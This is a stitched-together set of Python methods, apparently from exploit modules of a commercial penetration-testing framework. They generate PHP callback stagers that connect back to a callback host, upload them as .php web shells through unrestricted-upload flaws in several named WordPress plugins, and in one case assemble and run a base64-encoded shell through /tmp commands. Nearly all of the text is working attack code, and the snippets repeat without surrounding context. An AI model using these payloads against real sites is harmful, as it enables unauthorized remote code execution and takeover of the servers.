def get_php_to_mosdef(self):
localhost = self.callback.ip
localport = self.callback.port
badchars = ""
ret = get_php_stage1(badchars,localhost,localport)
return ret
def uploadShell(self, exheaders):
"""
Upload a shell through our authenticated session
The plugin doesn't restrict file upload types, vulnerability #2
"""
# Generate the PHP callback
host = self.callback.ip
port = self.callback.port
badChars = ""
# This is the code that'll be inserted on the remote machine
# if you want a custom shell do it here
ret = "<?php " + get_php_stage1(badChars, host, port) + " ?>"
# Create our payload to POST
payload = ""
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"action\"\r\n"
payload += "\r\nupload_file\r\n"
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"file_type\"\r\n"
payload += "\r\nhomescreen_image\r\n"
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"setting_name\"\r\n"
payload += "\r\nwptouch__foundation__android_others_icon\r\n"
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"wp_nonce\"\r\n"
payload += "\r\n%s\r\n" % self.nonce
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"myfile\"; filename=\"%s.php\"\r\n" % self.shellFile
payload += "Content-Type: application/octet-stream\r\n\r\n"
payload += "%s\r\n" % ret
payload += "--576a5sdf6--\r\n"
# Update connection parameters
url = self.url + "wp-admin/admin-ajax.php"
exheaders.remove(("Content-Type", "application/x-www-form-urlencoded"))
exheaders.append(
("Content-Type", "multipart/form-data; boundary=576a5sdf6"))
# Make the POST
(res, code) = spkproxy.urlopen(url,
extraheaders=exheaders,
data=payload,
verb="POST",
hostname=self.hostname,
exploit=self,
entireresponse=False,
return_response_code=True)
# Check for failure
text = res.read()
if re.search("sufficient permissions", text):
self.log(
"[EE] The account provided did not have the required permissions to exploit this vulnerability"
)
return False
else:
self.log("[ii] Shell upload seems to have been successful")
return True
def get_php_to_mosdef(self, host, port):
"""
Creates a string which when included in php's eval() will download and execute
MOSDEF
"""
self.log("Using PHPMULTI callback of %s:%d" % (host, port))
badchars = ''
ret = get_php_stage1(badchars, host, port)
return ret
def uploadShell(self, exheaders):
"""
Simplest shell upload ever, just POST to the page :)
"""
# Generate the PHP callback
host = self.callback.ip
port = self.callback.port
badChars = ""
# This is the code that'll be inserted on the remote machine
# if you want a custom shell do it here
ret = "<?php " + get_php_stage1(badChars, host, port) + " ?>"
# Create our payload to POST
payload = ""
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"uploader_uid\"\r\n"
payload += "\r\n1\r\n"
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"uploader_dir\"\r\n"
payload += "\r\n\r\n" # Giving this a directory like (./) will wipe that directory :(
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"uploader_url\"\r\n"
payload += "\r\n" + self.url + "wp-content/plugins/wp-symposium/server/php\r\n"
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"files[]\"; filename=\"%s.php\"\r\n" % self.shellFile
payload += "Content-Type: application/octet-stream\r\n\r\n"
payload += "%s\r\n" % ret
payload += "--576a5sdf6--\r\n"
# Update connection parameters
exheaders.remove(("Content-Type", "application/x-www-form-urlencoded"))
exheaders.append(
("Content-Type", "multipart/form-data; boundary=576a5sdf6"))
# Make the POST
(res, code) = spkproxy.urlopen(
self.url + "wp-content/plugins/wp-symposium/server/php/",
extraheaders=exheaders,
data=payload,
verb="POST",
hostname=self.hostname,
exploit=self,
entireresponse=False,
return_response_code=True)
# Check for failure
text = res.read()
if re.search("error", text):
self.log(
"[EE] The wp-content/plugins/wp-symposium/server/php/ directory may not be writable, see exploit notes for more information"
)
return False
else:
self.log("[ii] Shell upload seems to have been successful")
return True
def get_php_to_mosdef(self):
"""
Creates a string which when included in php's eval() will download and execute
MOSDEF
"""
localhost = self.callback.ip
localport = self.callback.port
logging.info("Using PHPMULTI callback of %s:%d" %
(localhost, localport))
badchars = "" #none for this one
return get_php_stage1(badchars, localhost, localport)
def uploadShell(self, exheaders):
"""
Upload a shell through our authenticated session using the found nonce
"""
# Generate the PHP callback
host = self.callback.ip
port = self.callback.port
badChars = ""
# This is the code that'll be inserted on the remote machine, if you want a custom shell do it here
ret = "<?php " + get_php_stage1(badChars, host, port) + " ?>"
# Create our payload to POST
payload = ""
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"name\"\r\n"
payload += "\r\n%s\r\n" % self.shellFile
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"_ajax_nonce\"\r\n"
payload += "\r\n%s\r\n" % self.nonce
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"action\"\r\n"
payload += "\r\nfile_upload\r\n"
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"async-upload\"; filename=\"%s.php\"\r\n" % self.shellFile
payload += "Content-Type: text/plain \r\n\r\n"
payload += "%s\r\n" % ret
payload += "--576a5sdf6\r\n"
# Update connection parameters
url = self.url + "wp-admin/admin-ajax.php"
exheaders.append(
("Content-Type", "multipart/form-data; boundary=576a5sdf6"))
# Make the POST
(res, code) = spkproxy.urlopen(url,
extraheaders=exheaders,
data=payload,
verb="POST",
hostname=self.hostname,
exploit=self,
entireresponse=True,
return_response_code=True)
# Check for failure
if code == 200:
data = res.read().splitlines()
ret = re.search("(\d\.\d\d)", data[-1])
if ret and ret.groups()[0] != "0.00":
self.log("[ii] Callback upload successful")
return True
return False
def get_php_to_mosdef(self):
"""
Creates a string which when included in php's eval() will download and execute
MOSDEF
"""
localhost = self.callback.ip
localport = self.callback.port
logging.info("Using PHPMULTI callback of {0}:{1}".format(
localhost, localport))
badchars = ""
return phplistener.get_php_stage1(badchars, localhost, localport)
def get_php_to_mosdef(self):
"""
Creates a string which when included in php's eval() will execute MOSDEF and connect to the Callback Address
"""
localhost = self.callback.ip
localport = self.callback.port
logging.info("Using PHPMULTI callback for %s:%d" % (localhost, localport))
from phplistener import get_php_stage1 # Gets our "Shellcode"
badchars = self.badstring
ret = get_php_stage1(badchars,localhost,localport)
logging.info("Generated callback shell")
return ret
def get_php_to_mosdef(self):
"""
Creates a string which when included in php's eval() will
download and execute MOSDEF
"""
localhost = self.callback.ip
localport = self.callback.port
self.log_info("Using PHPMULTI callback for %s:%d" %
(localhost, localport))
from phplistener import get_php_stage1 #get our "Shellcode"
badchars = self.badstring
ret = get_php_stage1(badchars, localhost, localport)
return ret
def uploadShell(self, exheaders):
"""
Upload a shell through our authenticated session
The plugin doesn't restrict file upload types, vulnerability #2
"""
# Generate the PHP callback
host = self.callback.ip
port = self.callback.port
badChars = ""
# This is the code that'll be inserted on the remote machine
# if you want a custom shell do it here
ret = "<?php " + get_php_stage1(badChars, host, port) + " ?>"
# Create our payload to POST
payload = ""
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"datemd5\"\r\n"
payload += "\r\n1\r\n"
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"Filedata\"; filename=\"%s.php\"\r\n" % self.shellFile
payload += "Content-Type: application/octet-stream\r\n\r\n"
payload += "%s\r\n" % ret
payload += "--576a5sdf6--\r\n"
# Update connection parameters
url = self.url + "wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php"
exheaders.remove(("Content-Type", "application/x-www-form-urlencoded"))
exheaders.append(
("Content-Type", "multipart/form-data; boundary=576a5sdf6"))
# Make the POST
(res, code) = spkproxy.urlopen(url,
extraheaders=exheaders,
data=payload,
verb="POST",
hostname=self.hostname,
exploit=self,
entireresponse=False,
return_response_code=True)
# Check for failure
if code == 200:
self.log_info("Shell upload may have been successful")
else:
self.log_info(
"Received unexpected status code of %d when attempting upload, proceeding anyway"
% code)
return True
def get_php_to_mosdef(self):
"""
Creates a string which when included in php's eval() will download and execute
MOSDEF
"""
localhost=self.callback.ip
localport=self.callback.port
self.log("Using PHPMULTI callback of %s:%d"%(localhost,localport))
#ret="touch /tmp/canvas" #tester
from phplistener import get_php_stage1 #get our "Shellcode"
#cannot use / in this code (theoretically)
badchars="/"
ret="<? "+get_php_stage1(badchars,localhost,localport)+" ?>"
self.log("Generated callback shell of: %s"%ret)
return ret
def get_php_to_mosdef(self):
"""
Creates a string which when included in php's eval() will download and execute
MOSDEF
"""
if not self.callback:
self.log("No callback specified! You need to specify a callback for this exploit!")
return ""
localhost=self.callback.ip
localport=self.callback.port
self.log("Using PHPMULTI callback of %s:%d"%(localhost,localport))
badchars="" #none for this one
ret=get_php_stage1(badchars,localhost,localport)
return ret
def get_php_to_mosdef(self):
"""
Creates a string which when included in php's eval() will download and execute
MOSDEF
"""
#self.log("Note: You need to input a command for horde . . . automatic loading of MOSDEF will be in a future release")
localhost = self.callback.ip
localport = self.callback.port
self.log("Using PHPMULTI callback of %s:%d" % (localhost, localport))
#ret="touch /tmp/canvas" #tester
from phplistener import get_php_stage1 #get our "Shellcode"
if 1:
#cannot use / in this code
badchars = "/"
ret = get_php_stage1(badchars, localhost, localport)
return ret
def generateCommands(self):
"""
Create the list of commands we'll be executing to get a connect back shell
"""
# Create a list to store our commands in order of execution
commands = [
"rm -f /tmp/x* test*" # Delete previous attempts
]
# Create the PHP callback
host = self.callback.ip
port = self.callback.port
badchars = ""
# If you're using a custom PHP shell, add it here
ret = "<?php " + get_php_stage1(badchars, host, port) + " ?>"
phpCallback = base64.b64encode(ret)
# Split out b64'd callback into 50 byte chunks
for x in xrange(0, len(phpCallback), 50):
self.shellChunks.append(phpCallback[x:x + 50])
# Dump those chunks into files
x = 0
for chunk in self.shellChunks:
commands.append("echo %s >> /tmp/x%d" % (chunk, x))
x += 1
# Concatinate files while removing newlines
tempCmd = " cd /tmp; head -c -1 -q "
for y in xrange(0, x):
tempCmd += "x%d " % y
tempCmd += "> /tmp/test"
commands.append(tempCmd)
# Unbase64 the callbcak
commands.append("base64 -d /tmp/test > /tmp/test.php")
# Run it
commands.append("php /tmp/test.php")
return commands
def uploadShell(self, exheaders):
"""
Upload a shell through our authenticated session
"""
# Generate the PHP callback
host = self.callback.ip
port = self.callback.port
badChars = ""
# This is the code that'll be inserted on the remote machine, if you want a custom shell do it here
ret = "<?php " + get_php_stage1(badChars, host, port) + " ?>"
# Create our payload to POST
payload = ""
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"Slide[id]\"\r\n"
payload += "\r\n\r\n"
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"Slide[order]\"\r\n"
payload += "\r\n\r\n"
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"Slide[title]\"\r\n"
payload += "\r\n%s\r\n" % self.slideTitle
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"Slide[description]\"\r\n"
payload += "\r\nDefault slide\r\n" # This value appears to be overridden by the Slide[title] value
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"Slide[showinfo]\"\r\n"
payload += "\r\nboth\r\n"
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"Slide[iopacity]\"\r\n"
payload += "\r\n70\r\n"
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"Slide[type]\"\r\n"
payload += "\r\nfile\r\n"
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"image_file\"; filename=\"%s.php\"\r\n" % self.shellFile
payload += "Content-Type: application/octet-stream\r\n\r\n"
payload += "%s\r\n" % ret
payload += "--576a5sdf6--\r\n"
payload += "Content-Disposition: form-data; name=\"Slide[image_url]\"\r\n"
payload += "\r\n\r\n"
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"Slide[uselink]\"\r\n"
payload += "\r\nN\r\n"
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"Slide[link]\"\r\n"
payload += "\r\n\r\n"
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"Slide[linktarget]\"\r\n"
payload += "\r\nself\r\n"
payload += "--576a5sdf6\r\n"
payload += "Content-Disposition: form-data; name=\"submit\"\r\n"
payload += "\r\nSave Slide\r\n"
payload += "--576a5sdf6\r\n"
# Update connection parameters
url = self.url + "wp-admin/admin.php?page=slideshow-slides&method=save"
exheaders.remove(("Content-Type", "application/x-www-form-urlencoded"))
exheaders.append(
("Content-Type", "multipart/form-data; boundary=576a5sdf6"))
# Make the POST
(res, code) = spkproxy.urlopen(url,
extraheaders=exheaders,
data=payload,
verb="POST",
hostname=self.hostname,
exploit=self,
entireresponse=False,
return_response_code=True)
# Check for failure
text = res.read()
if re.search("sufficient permissions", text):
self.log(
"[EE] The account provided did not have the required permissions to exploit this vulnerability"
)
return False
return True